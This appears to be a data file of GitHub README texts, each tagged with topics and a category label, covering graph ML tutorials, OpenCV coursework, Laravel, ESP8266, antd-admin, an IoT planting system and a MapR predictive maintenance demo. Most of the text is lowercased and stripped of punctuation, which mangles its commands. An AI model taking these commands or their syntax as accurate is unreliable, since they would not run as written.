tutorials for machine learning on graphs github workflow status https img shields io github workflow status mims harvard graphml tutorials run 20dependency 20test logo python logocolor 23ee4c2c style flat contributors payal chandak chandak mit edu haoxin li haoxin li hsph harvard edu min jean cho min jean cho brown edu pavlin policar pavlin policar fri uni lj si mert erden mert erden tufts edu steffan paul steffanpaul g harvard edu marinka zitnik marinka hms harvard edu overview graph machine learning provides a powerful toolbox to learn representations from any arbitrary graph structure and use learned representations for a variety of downstream tasks these tutorials aim to 1 introduce the concept of graph neural networks gnns 2 discuss the theoretical motivation behind different gnn architectures 3 provide implementations of these architectures 4 apply the architectures to key prediction problems on interconnected data in science and medicine 5 provide end to end real world examples of graph machine learning graph ml graphml png requirements recent versions of numpy pytorch pytorch geometric and jupyter are required installation all the required packages can be installed using the following commands 1 git clone https github com mims harvard graphml tutorials git 2 cd graphml tutorials 3 chmod x install sh install sh 4 conda activate graphml venv contributing pull requests are welcome license mit https choosealicense com licenses mit
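The neighbourhood aggregation at the heart of the gnn architectures these tutorials introduce can be sketched without pytorch geometric. This is a minimal mean-aggregation layer over an adjacency list; the dictionary representation and the absence of learned weights are simplifying assumptions:

```python
def message_passing_step(features, neighbors):
    """One GNN layer sketch: each node's new feature is the mean of its own
    and its neighbors' current features (no learned transform, for clarity)."""
    updated = {}
    for node, feat in features.items():
        msgs = [features[n] for n in neighbors.get(node, [])] + [feat]
        dim = len(feat)
        updated[node] = [sum(m[i] for m in msgs) / len(msgs) for i in range(dim)]
    return updated

# toy 3-node path graph a - b - c
feats = {"a": [1.0, 0.0], "b": [0.0, 1.0], "c": [1.0, 1.0]}
adj = {"a": ["b"], "b": ["a", "c"], "c": ["b"]}
out = message_passing_step(feats, adj)
```

Stacking several such steps lets information flow across the graph; real architectures (gcn, graphsage, gat) add learnable weight matrices, nonlinearities, and different aggregation schemes.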
graph-neural-networks embeddings network-embeddings representation-learning graph-convolutional-networks networks tutorials graph-ml deep-learning
ai
Computer-vision
computer vision this repository collects the code i gathered while attending professor sungho kim s computer vision class at yeungnam university along with my personal studies 0 outline 1 install opencv 1 install opencv 2 camera distortion 2 camera distortion 3 color space 3 color space 4 image filtering 4 image filtering 5 edge 5 edge 6 corner and blob detector 6 corner and blob detector 7 fitting 7 fitting 8 calibration 8 calibration 9 stereo matching and rendering 9 stereo matching and rendering 10 face and body detection 10 face and body detection 1 install opencv i installed opencv version 2 4 13 6 https opencv org releases environment variables c opencv24136 build x86 vc14 bin vs setting include directories c opencv24136 build include library directories c opencv24136 build x86 vc14 lib additional dependencies opencv calib3d2413d lib opencv contrib2413d lib opencv core2413d lib opencv features2d2413d lib opencv flann2413d lib opencv gpu2413d lib opencv highgui2413d lib opencv imgproc2413d lib opencv legacy2413d lib opencv ml2413d lib opencv nonfree2413d lib opencv objdetect2413d lib opencv ocl2413d lib opencv photo2413d lib opencv stitching2413d lib opencv superres2413d lib opencv ts2413d lib opencv video2413d lib opencv videostab2413d lib go 0 outline 0 outline 2 camera distortion result input output soccer distortion https user images githubusercontent com 56310078 76083123 34bfdb80 5ff0 11ea 9796 43c0a911ceac jpg 2 camera distortion result https user images githubusercontent com 56310078 76083138 3a1d2600 5ff0 11ea 9433 7b1abac7e9c6 jpg go 0 outline 0 outline 3 color space result input output blue output green output red corni fructus https user images githubusercontent com 56310078 76083276 92ecbe80 5ff0 11ea 8aef 60ea1ed2a52c jpg 3 color blue https user images githubusercontent com 56310078 76083261 89fbed00 5ff0 11ea 8c9f 0ee4d846f4d7 jpg 3 color green https user images githubusercontent com 56310078 76083263 8b2d1a00 5ff0 11ea
8706 a884edb95961 jpg 3 color red https user images githubusercontent com 56310078 76083266 8cf6dd80 5ff0 11ea 8b5e df3049b0cc12 jpg another result input output blue output green output red img src https user images githubusercontent com 56310078 76084072 718cd200 5ff2 11ea 98cd 8b92390aea6a jpg width 200 height 200 img src https user images githubusercontent com 56310078 76084158 9bde8f80 5ff2 11ea 815f 0a85ca2403bb jpg width 200 height 200 img src https user images githubusercontent com 56310078 76084154 9aad6280 5ff2 11ea 800c e2061737eb9c jpg width 200 height 200 img src https user images githubusercontent com 56310078 76084152 997c3580 5ff2 11ea 957d aa1a98f2e491 jpg width 200 height 200 input color input output blue output green output red img src https user images githubusercontent com 56310078 76084072 718cd200 5ff2 11ea 98cd 8b92390aea6a jpg width 200 height 200 img src https user images githubusercontent com 56310078 76084514 5cfd0980 5ff3 11ea 998d 8f1f670e204c png width 200 height 200 img src https user images githubusercontent com 56310078 76084510 5bcbdc80 5ff3 11ea 9e21 df6b9b88bbf3 png width 200 height 200 img src https user images githubusercontent com 56310078 76084508 5b334600 5ff3 11ea 87be 4d03309f7a99 png width 200 height 200 builtin function vs implementation rgb to gray input output builtin output implementation img src https user images githubusercontent com 56310078 76084072 718cd200 5ff2 11ea 98cd 8b92390aea6a jpg width 250 height 250 img src https user images githubusercontent com 56310078 76085021 8cf8dc80 5ff4 11ea 809e fc485a5e0b13 jpg width 250 height 250 img src https user images githubusercontent com 56310078 76085028 8e2a0980 5ff4 11ea 9498 d9712e9057e9 jpg width 250 height 250 builtin function vs implementation rgb to hsi input output builtin hsv output implementation hsi img src https user images githubusercontent com 56310078 76084072 718cd200 5ff2 11ea 98cd 8b92390aea6a jpg width 250 height 250 img src https user images 
githubusercontent com 56310078 76085641 cc73f880 5ff5 11ea 9b2b a8f3ff258cff jpg width 250 height 250 img src https user images githubusercontent com 56310078 76085643 cda52580 5ff5 11ea 805c bf5fe749549a jpg width 250 height 250 hsi hue saturation intensity of implementation hue saturation intensity img src https user images githubusercontent com 56310078 76085648 ced65280 5ff5 11ea 8844 9f5ed2b783f7 jpg width 250 height 250 img src https user images githubusercontent com 56310078 76085649 d0077f80 5ff5 11ea 9dfa 1fd499205b3d jpg width 250 height 250 img src https user images githubusercontent com 56310078 76085653 d1d14300 5ff5 11ea 9c1b 8adfb4fb283b jpg width 250 height 250 builtin function vs implementation rgb to hsv input output builtin hsv output implementation hsv img src https user images githubusercontent com 56310078 76084072 718cd200 5ff2 11ea 98cd 8b92390aea6a jpg width 250 height 250 img src https user images githubusercontent com 56310078 76085641 cc73f880 5ff5 11ea 9b2b a8f3ff258cff jpg width 250 height 250 img src https user images githubusercontent com 56310078 76090098 4d36f280 5ffe 11ea 8a92 a61d428e682a jpg width 250 height 250 hsv hue saturation value of implementation hue saturation value img src https user images githubusercontent com 56310078 76090099 4dcf8900 5ffe 11ea 8440 e5c01638803f jpg width 250 height 250 img src https user images githubusercontent com 56310078 76090103 4f00b600 5ffe 11ea 9c7b adc461fc66ef jpg width 250 height 250 img src https user images githubusercontent com 56310078 76090104 5031e300 5ffe 11ea 9a5e 15bb1915c41e jpg width 250 height 250 go 0 outline 0 outline 4 image filtering blur result smoothed image input output kernel 1x1 output kernel 3x3 output kernel 5x5 img src https user images githubusercontent com 56310078 76087010 a56af600 5ff8 11ea 8817 9f2f09786918 jpg width 150 height 150 img src https user images githubusercontent com 56310078 76087030 ae5bc780 5ff8 11ea 8a91 f8ee28d74448 jpg width 150 height 150 
img src https user images githubusercontent com 56310078 76087032 aef45e00 5ff8 11ea 9d2d a7a82587b9b9 jpg width 150 height 150 img src https user images githubusercontent com 56310078 76087033 b0258b00 5ff8 11ea 9d17 a4fd3d094acd jpg width 150 height 150 output kernel 11x11 output kernel 19x19 output kernel 25x25 output kernel 29x29 img src https user images githubusercontent com 56310078 76087054 b582d580 5ff8 11ea 82d9 9dfe15ac3667 jpg width 150 height 150 img src https user images githubusercontent com 56310078 76087057 b7e52f80 5ff8 11ea 9227 d35d6239d454 jpg width 150 height 150 img src https user images githubusercontent com 56310078 76087063 bae02000 5ff8 11ea 824b b35839d9a86e jpg width 150 height 150 img src https user images githubusercontent com 56310078 76087073 bddb1080 5ff8 11ea 80ac a4f2ef0bd19b jpg width 150 height 150 salt pepper result filtered image median vs gaussian input output salt pepper noised img src https user images githubusercontent com 56310078 76087010 a56af600 5ff8 11ea 8817 9f2f09786918 jpg width 400 height 400 img src https user images githubusercontent com 56310078 76087513 a5b7c100 5ff9 11ea 8baa a7b3ff27ca0d jpg width 400 height 400 output median filtered 1x1 output gaussian filtered 1x1 img src https user images githubusercontent com 56310078 76088019 a866e600 5ffa 11ea 9f67 ec1d50d24bad jpg width 400 height 400 img src https user images githubusercontent com 56310078 76087994 9e44e780 5ffa 11ea 95b1 3e4327836b82 jpg width 400 height 400 output median filtered 3x3 output gaussian filtered 3x3 img src https user images githubusercontent com 56310078 76088022 a9981300 5ffa 11ea 9b17 ef56a9f42179 jpg width 400 height 400 img src https user images githubusercontent com 56310078 76087996 9f761480 5ffa 11ea 9a1f f8a48aa4ded1 jpg width 400 height 400 output median filtered 5x5 output gaussian filtered 5x5 img src https user images githubusercontent com 56310078 76088026 aac94000 5ffa 11ea 9ef0 a4558ff3551f jpg width 400 height 400 
(result images: median- vs. Gaussian-filtered output at 7x7 and 9x9 kernels, omitted)

**Salt & pepper result — filtered image vs. sigma of Gaussian:** outputs at sigmaX = sigmaY = 1, 3, and 5 (result images omitted).

**Median vs. Gaussian on Gaussian noise:** the same Gaussian-kernel example repeated on a Gaussian-noised input — outputs at kernel sizes 1x1, 3x3, 5x5, 7x7, and 9x9, and at sigmaX = sigmaY = 1, 3, and 5 (result images omitted). The median filter excels at impulse (salt-and-pepper) noise, while the Gaussian filter is the better match for Gaussian noise.

[go outline](#outline)

## 5. Edge

**Canny edge:** input/output pairs, with outputs at min threshold 0, 25, 50, 75, and 100 (result images omitted).

**Sobel edge:** x-direction, y-direction, and combined x+y gradient magnitude (result images omitted).

[go outline](#outline)

## 6. Corner and blob detector

**Harris corner detector:** with a low threshold, many corners are detected (input/output images omitted).

**SIFT blob detector:** input/output (images omitted).

[go outline](#outline)

## 7. Fitting

**Find good matches** (e.g. method LMEDS): input/output pairs for the object image, the scene image, and the good-matches/object-detection result (images omitted).

**Homography estimation:** the `method` parameter of the `findHomography` function compared for 0, RANSAC, and LMEDS — object, scene, and good-matches/object-detection results shown for each (images omitted).

[go outline](#outline)

## 8. Calibration

1. Print a checkerboard.
2. Use the CamCalibrator tool of darkpgmr.
3. Check, calibrate, and calculate the focal length of your camera.

[go outline](#outline)

## 9. Stereo matching and rendering

**Block-matching-based disparity:** left/right inputs, with outputs at support-window sizes 5, 7, 9, 11, 15, 17, 19, and 21 (images omitted).

**3D rendering:** depth image and rendered result at viewpoints (x, y, z) = (0, 0, 140), (56, 0, 140), (42, 0, 140), and (0, 0, 0) (images omitted).

**Texture mapping on the 3D shape using OpenGL:** input, output (no move), output (move), and output (inner) views (images omitted). Full video demo: https://blog.naver.com/kimnanhee97/221841256177

[go outline](#outline)

## 10. Face and body detection

Input/output example (images omitted).

[go outline](#outline)

## Image source

- Searching at Google, MATLAB, nanhee kim's and Sungho Kim's class
- Colorful stock: www.123rf.com, photo 48456275 (abstract colorful graphic background made of colored cubes)
- Corni fructus: https://blog.naver.com/ds4098/221410254623
- Earth: https://solarsystem.nasa.gov/resources/786/blue-marble-2002
- Colorful star, Rhone River (Vincent van Gogh), Lemona: searching at Google
- My images: nanhee kim; others: Prof. Sungho Kim's class and MATLAB

## Author

nanhee kim ([nh9k](https://nh9k.github.io/2020-01-28-introduce-myself))
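The kernel-size comparisons above show why a median filter beats Gaussian smoothing on salt-and-pepper noise. The course code uses OpenCV; the sketch below re-implements tiny 3x3 versions in plain NumPy just to illustrate the difference (a box blur stands in for a small Gaussian kernel).

```python
import numpy as np

def median_filter_3x3(img):
    """Naive 3x3 median filter (edge pixels left unchanged)."""
    out = img.copy().astype(float)
    for y in range(1, img.shape[0] - 1):
        for x in range(1, img.shape[1] - 1):
            out[y, x] = np.median(img[y-1:y+2, x-1:x+2])
    return out

def box_blur_3x3(img):
    """3x3 mean blur as a stand-in for a small Gaussian kernel."""
    out = img.copy().astype(float)
    for y in range(1, img.shape[0] - 1):
        for x in range(1, img.shape[1] - 1):
            out[y, x] = img[y-1:y+2, x-1:x+2].mean()
    return out

# Flat gray image with one salt (255) and one pepper (0) pixel.
img = np.full((7, 7), 100.0)
img[3, 3] = 255.0   # salt
img[2, 2] = 0.0     # pepper

median = median_filter_3x3(img)
blur = box_blur_3x3(img)

# The median filter restores both outliers to the background value...
print(median[3, 3], median[2, 2])   # 100.0 100.0
# ...while the blur only spreads them into their neighborhoods.
print(round(blur[3, 3], 1))         # 106.1
```

This is why the 3x3 and 5x5 median outputs above look clean while the Gaussian outputs still show smeared speckles.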
camera-distortion color-space image-filtering edge corner-and-blob-detector fitting calibration stereo-matching-and-rendering face-and-body-detection opencv opengl
ai
sample_laravel_app
Steps to set up:

1. Clone repository
2. `composer install`
3. `cp .env.example .env`
4. Set up necessary `.env` config (e.g. database)
5. `php artisan key:generate`
6. `php artisan migrate`
7. `php artisan passport:install`
8. `php artisan serve`
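The steps above can be collected into one setup script. This is a sketch, assuming PHP, Composer, and a database reachable via the `.env` settings are already available; the repository URL is a placeholder.

```shell
#!/bin/sh
# One-time local setup for the sample Laravel app.
set -e

git clone <repository-url> sample_laravel_app   # placeholder URL
cd sample_laravel_app

composer install                 # install PHP dependencies
cp .env.example .env             # create local environment file
# edit .env here: DB_DATABASE, DB_USERNAME, DB_PASSWORD, ...

php artisan key:generate         # set APP_KEY in .env
php artisan migrate              # create database tables
php artisan passport:install     # create OAuth keys and clients
php artisan serve                # serve on http://127.0.0.1:8000
```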
server
ESP8266-open-rtos
ESP8266 open-rtos development plugin for JetBrains CLion. This plugin allows you to develop a new project using [esp-open-rtos](https://github.com/superhouse/esp-open-rtos) and flash it directly.

## Installation

Install the plugin from the [JetBrains repository](https://plugins.jetbrains.com/plugin). You also have to install [esp-open-rtos](https://github.com/superhouse/esp-open-rtos), [esptool](https://github.com/espressif/esptool), and the Xtensa compiler from [esp-open-sdk](https://github.com/pfalcon/esp-open-sdk). Unlike the esp-open-rtos instructions, you don't have to add the path of the Xtensa compiler to the PATH environment variable; it is enough to indicate it in the plugin setup phase.

## Setup

In Settings > Build, Execution, Deployment > Build Tools > ESP8266 Config, set the `xtensa-lx106-elf-gcc` and `xtensa-lx106-elf-g++` program paths.

## Creating a new project

File > New Project, then select the C ESP8266 FreeRTOS type. Set the desired flash size, flash mode, flash speed, and serial port to use, and select the extra projects you want to use. Press the Create button: the plugin will then create all the files CLion needs in order to compile and flash. Depending on the target selected, it also creates a basic starting file (main user.c).

## Others

If you like the plugin you may star the project at GitHub (button at top right of the page) and at the [JetBrains plugins repository](https://plugins.jetbrains.com/plugin/10115).
os
antd-admin
<p align="center"><a href="http://github.com/zuiidea/antd-admin"><img alt="antd-admin" height="64" src="docs/media/logo.svg"></a></p>
<h1 align="center">antd-admin</h1>
<div align="center">An excellent front-end solution for enterprise applications.</div>

(badges: antd 4.0.0 · umi 2.2.1 · GitHub issues · MIT license · Travis CI · PRs welcome · Gitter — shield images omitted)

- Preview: https://antd-admin.zuiidea.com
- Documentation: https://superlbr.gitee.io/antd-admin
- FAQ: https://doc.antd-admin.zuiidea.com/faq
- Changelog: https://doc.antd-admin.zuiidea.com/change-log
- English | [README.zh-CN.md](README.zh-CN.md)

## Features

- Internationalization: extracting translation fields from source code, loading language packs on demand
- Dynamic permissions: different permissions for different menus
- Elegant and beautiful: Ant Design system
- Mock data: local data debugging

## Usage

1. Clone project code.

```bash
git clone https://github.com/zuiidea/antd-admin.git my-project
cd my-project
```

2. Install dependencies.

```bash
yarn install
```

or

```bash
npm install
```

3. Start local server.

```bash
npm run start
```

4. After the startup is complete, open a browser and visit http://localhost:7000. If you need to change the startup port, you can configure it in the `.env` file.

5. For the login page there are two accounts: username `admin`, password `admin`; and username `guest`, password `guest`.

More instructions at the [documentation](https://doc.antd-admin.zuiidea.com).

## Browsers support

Modern browsers: IE11/Edge, and the last 2 versions of Firefox, Chrome, Safari, and Opera (browser-logo images omitted).

## Contributing

We very much welcome your contribution. You can build together with us in the following ways:

- Use Ant Design Pro in your daily work.
- Submit [GitHub issues](http://github.com/zuiidea/antd-admin/issues) to report bugs or ask questions.
- Propose [pull requests](http://github.com/zuiidea/antd-admin/pulls) to improve our code.
antd react mock admin dashboard
front_end
Smart-IoT-Planting-System
# SIPS — Smart IoT Planting System

(MIT licence badge)

SIPS is an intelligent, automatic planting system for the agricultural greenhouse, based on IoT technology. It consists of sensors, a terminal device (STM32 MCU), a gateway (RPi), and a web server. The system adopts LoRa, MQTT, a GSM module, the Django web framework, ECharts, Bootstrap, and Ajax. Most of the source code is implemented in Python.

## Features

- Environmental monitoring: show environment information such as air temperature, humidity, light intensity, soil moisture, water level, and raining volume.
- Irrigating: remotely control the pump to irrigate by 3 methods — auto, manual, or regularly.
- Security system: trigger an alarm when detecting a signal from the IR sensor.
- Light controlling: control light by 3 methods — auto, manual, or regularly.
- Devices tracking: show the online status and battery of all the hardware devices.
- File management: manage database files of the gateway.

## Project diagram

(image: arch diagram)

## Hardware lists

(image: hardware kit)

## Obtain hardware

Contact me by mail, WeChat, or Twitter: mail [email protected], WeChat arvin-messi, Twitter messi_arvin.

## Deployment steps

- Download source code.
- Obtain hardware kits.
- Pyboard: wiring and firmware download.
- Gateway (Raspberry Pi): wiring, software deployment, and application running.
- Deploy the source code of the cloud on a server and execute it.
- Test the system via browser.

## Cloud UI

(image: environment dashboard)
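The environmental-monitoring feature above implies each terminal device periodically reports a sensor snapshot toward the gateway. A minimal Python sketch of such a payload and an auto-irrigation rule follows; the field names and the moisture threshold are hypothetical illustrations, not taken from this repo.

```python
import json
import time

def build_sensor_payload(device_id, air_temp, humidity, light, soil_moisture, water_level):
    """Assemble one environmental snapshot as a JSON string.

    Field names are illustrative; a real SIPS device would use whatever
    schema the gateway's MQTT consumer expects.
    """
    return json.dumps({
        "device": device_id,
        "timestamp": int(time.time()),
        "air_temperature_c": air_temp,
        "humidity_pct": humidity,
        "light_lux": light,
        "soil_moisture_pct": soil_moisture,
        "water_level_cm": water_level,
    })

def needs_irrigation(payload_json, moisture_threshold_pct=30):
    """Auto-irrigation rule: pump on when soil moisture drops below threshold."""
    reading = json.loads(payload_json)
    return reading["soil_moisture_pct"] < moisture_threshold_pct

payload = build_sensor_payload("greenhouse-1", 24.5, 61.0, 800, 22.0, 15.0)
print(needs_irrigation(payload))  # soil moisture 22% < 30% -> True
```

In the real system this payload would be published over MQTT (via LoRa to the gateway) rather than printed; the decision logic is the same either way.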
server
predictive-maintenance
mapr for predictive maintenance this project is intended to show how to build predictive maintenance applications on mapr predictive maintenance applications place high demands on data streaming time series data storage and machine learning therefore this project focuses on data ingest with mapr streams time series data storage with mapr db and opentsdb and feature engineering with mapr db and apache spark overview predictive maintenance requires a cutting edge data platform in order to handle fast streams of iot data with the processing required for on the fly feature engineering and the flexibility required for data science and machine learning ingesting factory iot data predictive maintenance applications rely heavily on ingesting multiple data sources each with their own format and throughput mapr streams can ingest data regardless of format or speed with standard kafka and restful apis machine learning on factory iot data the predictive aspects of predictive maintenance applications are usually realized through machine learning feature engineering is often considered the most important aspect of machine learning as opposed to neural network design for example feature engineering places the high demands on the data layer because the amount of data that iot data streams generate the tendency for failures to occur infrequently and without warning means vast amounts of raw time series data must be stored not only must it be stored but it must also be possible to retroactively update the lagging features necessary in order to label failures for the purposes of supervised machine learning mapr db and spark can work together to provide the capabiltieis required to put machine learning into practice for predictive maintance in summary mapr streams provide a convenient way to ingest iot data because it is scalable and provides convenient interfaces the integration of mapr db with spark provides a convenient way to label lagging features needed for predicting failures 
via supervised machine learning drill provides a convenient way to load ml data sets into tensorflow for unsupervised and supervised machine learning implementation summary there are two objectives relating to predictive maintenance implemented in this project the first objective is to visualize time series data in an interactive real time dashboard in grafana the second objective is to make raw data streams and derived features available to machine learning frameworks such as tensorflow in order to develop algorithms for anomaly detection and predictive maintenance these two objects are realized using two seperate data flows 1 the first flow located on the top half of the image below is intended to persist iot data and label training data for sequence prediction and anomaly detection of time series data in tensorflow img src https github com mapr demos predictive maintenance blob master images bi pipeline png width 50 2 the second flow located on the bottom half is intended to persist time series iot data in opentsdb for visualization in a grafana dashboard img src https github com mapr demos predictive maintenance blob master images ml pipeline png width 50 put together these data pipelines look like this the apis used for reading and writing data are shown in red img src https github com mapr demos predictive maintenance blob master images dataflow png width 50 preliminary steps these steps explain how to setup this tutorial using the mapr container for developers https maprdocs mapr com home maprcontainerdevelopers maprcontainerdevelopersoverview html on macos allocate 12gb to docker this tutorial requires a lot of memory we recommend allocating 12gb ram 4gb swap and 2 cpus to the docker community edition for macos img src https github com mapr demos predictive maintenance blob master images docker config png width 40 start the mapr sandbox download and run the mapr devsandbox container setup sh script git clone https github com mapr demos mapr db 60 getting 
started cd mapr db 60 getting started mapr devsandbox container setup sh run the init sh script run the init sh script to install spark opentsdb grafana and some other things necessary to use the sample applications in this tutorial ssh to the sandbox container with password mapr and run the following commands this should take about 20 minutes ssh p 2222 root localhost wget https raw githubusercontent com mapr demos predictive maintenance master init sh chmod 700 init sh sudo init sh import the grafana dashboard sudo opt mapr server configure sh r ot hostname f sudo opt mapr opentsdb opentsdb 2 4 0 etc init d opentsdb start open grafana data sources with a url like http maprdemo 3000 datasources edit 1 http maprdemo 3000 datasources edit 1 and add opentsdb as a new data source load the grafana iot dashboard json file using grafana s dashboard import functionality and specify maprmonitoringopentsdb as the data source as shown below img src https github com mapr demos predictive maintenance blob master images grafana import png width 50 hr predictive maintenance demo procedure for learning or debugging purposes you should run each of the following steps manually but if you just want to see data show up in grafana then just run run sh step 1 simulate hvac data stream we have provided a dataset captured from a real world heating ventilation and air conditioning hvac system in the sample dataset folder run the following command to replay that hvac stream to apps factory mqtt cat predictive maintenance sample dataset mqtt json while read line do echo line sed s timestamp date s g opt mapr kafka kafka bin kafka console producer sh topic apps factory mqtt broker list this will be ignored 9092 sleep 1 done step 2 save iot data stream to mapr db in the next step we ll save the iot data stream to opentsdb so we can visualize it in grafana but in this step we save that stream to mapr db so we can apply labels necessary for supervised machine learning as discussed in step 4 run 
the following command to persist messages from stream apps factory mqtt to mapr db table apps mqtt records opt mapr spark spark bin spark submit class com mapr examples mqttconsumer predictive maintenance target predictive maintenance 1 0 jar with dependencies jar apps factory mqtt apps mqtt records run this command to see how the row count increases opt mapr drill drill bin sqlline u jdbc drill n mapr select count from dfs apps mqtt records step 3 save iot data stream to opentsdb in this step we save the iot data stream to opentsdb so we can visualize it in grafana update localhost 4242 with the hostname and port of your opentsdb server before running the following command opt mapr kafka kafka bin kafka console consumer sh new consumer topic apps factory mqtt bootstrap server not applicable 0000 while read line do echo line jq r to entries map key value tostring t 0 x paste d awk system curl x post data x27 metric 3 timestamp 2 value 4 tags host localhost x27 http localhost 4242 api put echo n done after you have run that command you should be able to visualize the streaming iot data in grafana depending on where you have installed grafana this can be opened with a url like http maprdemo 3000 http maprdemo 3000 img src https github com mapr demos predictive maintenance blob master images grafana screenshot 2 png width 50 align center step 4 update lagging features in mapr db for each failure event this process will listen for failure events on a mapr streams topic and retroactively label lagging features in mapr db when failures occur as well as render the failure event in grafana update http localhost 3000 with the hostname and port for your grafana instance opt mapr spark spark bin spark submit class com mapr examples updatelaggingfeatures predictive maintenance target predictive maintenance 1 0 jar with dependencies jar apps factory failures apps mqtt records http localhost 3000 img src https github com mapr demos predictive maintenance blob master images 
lagging features explanation png width 70 align center this particular step probably says the most about the value of mapr because consider this if you have a factory instrumented by iot devices reporting hundreds of metrics per machine per second and you re tasked with the challenge of saving all that data until one day often months into the future you finally have a machine fail at that point you have to retroactively go back and update all those records as being about to fail or x days to failure so that you can use that data for training models to predict those lagging features that s one heck of a db update right the only way to store all that data is with a distributed database this is what makes spark and mapr db such a great fit spark the distributed processing engine for big data and mapr db the distributed data store for big data working together to process and store lots of data with speed and scalability step 5 simulate a failure event to simulate a device failure run this command echo timestamp date s d 60 sec ago devicename chiller1 opt mapr kafka kafka bin kafka console producer sh topic apps factory failures broker list this will be ignored 9092 this will trigger the spark process you ran in the previous step to update lagging features in the mapr db table apps mqtt records once it sees the event you simulated you should see it output information about the lagging features it labeled like this update lagging features screenshot images updatelagging screenshot png raw true update lagging features screenshot step 6 validate that lagging features have been updated mapr dbshell find apps mqtt records where eq chiller1abouttofail true f id chiller1abouttofail timestamp here are a few examples commands to look at that table with mapr dbshell mapr dbshell find apps mqtt records f timestamp find table apps mqtt records orderby id fields chiller2remainingusefullife id find table apps mqtt records where gt id 1523079964 orderby id fields 
chiller2remainingusefullife id find table apps mqtt records where gt timestamp 1523079964 fields chiller2remainingusefullife timestamp here s an example of querying iot data records table with drill opt mapr drill drill bin sqlline u jdbc drill n mapr select from dfs apps mqtt records limit 2 step 7 synthesize a high speed data stream this command simulates a high speed data stream from a vibration sensor sampling once per 10ms java cp predictive maintenance target predictive maintenance 1 0 jar with dependencies jar com mapr examples highspeedproducer apps fastdata vibrations 10 why are we simulating a vibration sensor degradation in machines often manifests itself as a low rumble or a small shake these unusual vibrations give you the first clue that a machine is nearing the end of its useful life so it s very important to detect those anomalies vibration sensors measure the displacement or velocity of motion thousands of times per second analyzing those signals is typically done in the frequency domain an algorithm called fast fourier transform fft can sample time series vibration data and identify its component frequencies in the next step you will run a command the converts the simulated vibration data to the frequency domain with an fft and raises alarms when vibration frequencies vary more than a predefined threshold vibration analysis images vibration analysis png raw true vibration analysis this demonstrates the capacity of mapr to ingest and process high speed streaming data depending on hardware you will probably see mapr streams processing more than 40 000 messages per second in this step step 8 process high speed data stream this will calculate ffts on the fly for the high speed streaming data and render an event in grafana when ffts changed more than 25 over a rolling window this simulates anomaly detection for a vibration signal update http localhost 3000 with the hostname and port for your grafana instance opt mapr spark spark bin spark submit class 
com mapr examples streamingfouriertransform predictive maintenance target predictive maintenance 1 0 jar with dependencies jar apps fastdata vibrations 25 0 http localhost 3000 step 9 visualize data in grafana by now you should be able to see streaming iot data vibration faults and device failures in the grafana dashboard img src https github com mapr demos predictive maintenance blob master images grafana screenshot png width 70 align center step 10 explore iot data with apache drill apache drill https drill apache org is a unix service that unifies access to data across a variety of data formats and sources mapr is the primary contributor to apache drill so naturally it is included in the mapr platform here s how you can use it to explore some of the iot data we ve gathered so far in this tutorial open the drill web interface if you re running mapr on your laptop then that s probably at http localhost 8047 http localhost 8047 here are a couple useful queries show how many messages have arrived cumulatively over days of the week select day of week long count day of week long from dfs apps mqtt records group by day of week long img src https github com mapr demos predictive maintenance blob master images drill query 1 png width 50 img src https github com mapr demos predictive maintenance blob master images drill result 1 png width 50 count how many faults have been detected with x as select id day of week long chiller1abouttofail row number over partition by chiller1abouttofail order by id as fault from dfs apps mqtt records select from x where chiller1abouttofail true and fault 1 img src https github com mapr demos predictive maintenance blob master images drill query 2 png width 50 img src https github com mapr demos predictive maintenance blob master images drill result 2 png width 50 drill can also be used to load data from mapr db into data science notebooks examples of this are shown in the following section references for machine learning techniques for 
predictive maintenance this tutorial focuses on data engineering i e getting data in the right format and in the right place in order to take advantage of machine learning ml for predictive maintenance applications the details of ml are beyond the scope of this tutorial but to better understand ml techniques commonly used for predictive maintenance check out the provided jupyter notebook for lstm predictions for about to fail https github com mapr demos predictive maintenance blob master notebooks jupyter lstm 20for 20predictive 20maintenance ian01 ipynb this notebook not only talks about how to use lstm but also how to generate a sample dataset with logsynth https github com tdunning log synth that resembles what you might see in a real factory this notebook is great because it explains how to experiment with lstms entirely on your laptop lstm about to fail images lstm about to fail 50 png raw true lstm about to fail prediction here are some of the other notebooks included in this repo that demonstrate ml concepts for predictive maintenance lstm predictions for remaining useful life https github com mapr demos predictive maintenance blob master notebooks jupyter lstm 20predictions 20for 20remaining 20useful 20life ipynb shows how to train a point regression model using an lstm neural network in keras to predict the point in time when an airplane engine will fail lstm time series predictions from opentsdb https github com mapr demos predictive maintenance blob master notebooks jupyter lstm 20time 20series 20prediction 20from 20opentsdb ipynb shows how to train a model to predict the next value in a sequence of numbers which in this case is a time series sequence of numbers stored in opentsdb this notebook also shows how to load training data into tensorflow using the rest api for opentsdb rnn time series predictions from opentsdb https github com mapr demos predictive maintenance blob master notebooks jupyter rnn 20time 20series 20prediction 20from 20opentsdb ipynb 
also shows how to train a model to predict the next value in a sequence of numbers except it uses an rnn model instead lstm rnn predictions for mapr db data via drill https github com mapr demos predictive maintenance blob master notebooks jupyter rnn 20predictions 20on 20mapr db 20data 20via 20drill ipynb also shows how to train a model to predict the next value in a sequence of numbers except it reads time series data from mapr db using drill as a sql engine streamsets demonstration to give you an idea of what dataflow management tools do i ve prepared a simple streamsets project that you can run on a laptop with docker this project demonstrates a pipeline that streams time series data recorded from an industrial hvac system into opentsdb for visualization in grafana create a docker network to bridge containers docker network create mynetwork start streamsets opentsdb and grafana docker run it p 18630 18630 d name sdc network mynetwork streamsets datacollector docker run dp 4242 4242 name hbase network mynetwork petergrace opentsdb docker docker run d p 3000 3000 name grafana network mynetwork grafana grafana open grafana at http localhost 3000 and login with admin admin add http hbase 4242 as an opentsdb datasource to grafana if you don t know how to add a data source refer to grafana docs your datasource definition should look like this img src https github com mapr demos predictive maintenance blob master images grafana opentsdb config png width 50 align center download the following grafana dashboard file wget https raw githubusercontent com mapr demos predictive maintenance master grafana iot dashboard json import that file into grafana if you don t know how to import a dashboard see grafana docs the grafana import dialog should look like this img src https github com mapr demos predictive maintenance blob master images grafana dashboard config png width 50 align center download unzip and copy the mqtt dataset to the streamsets container wget https github 
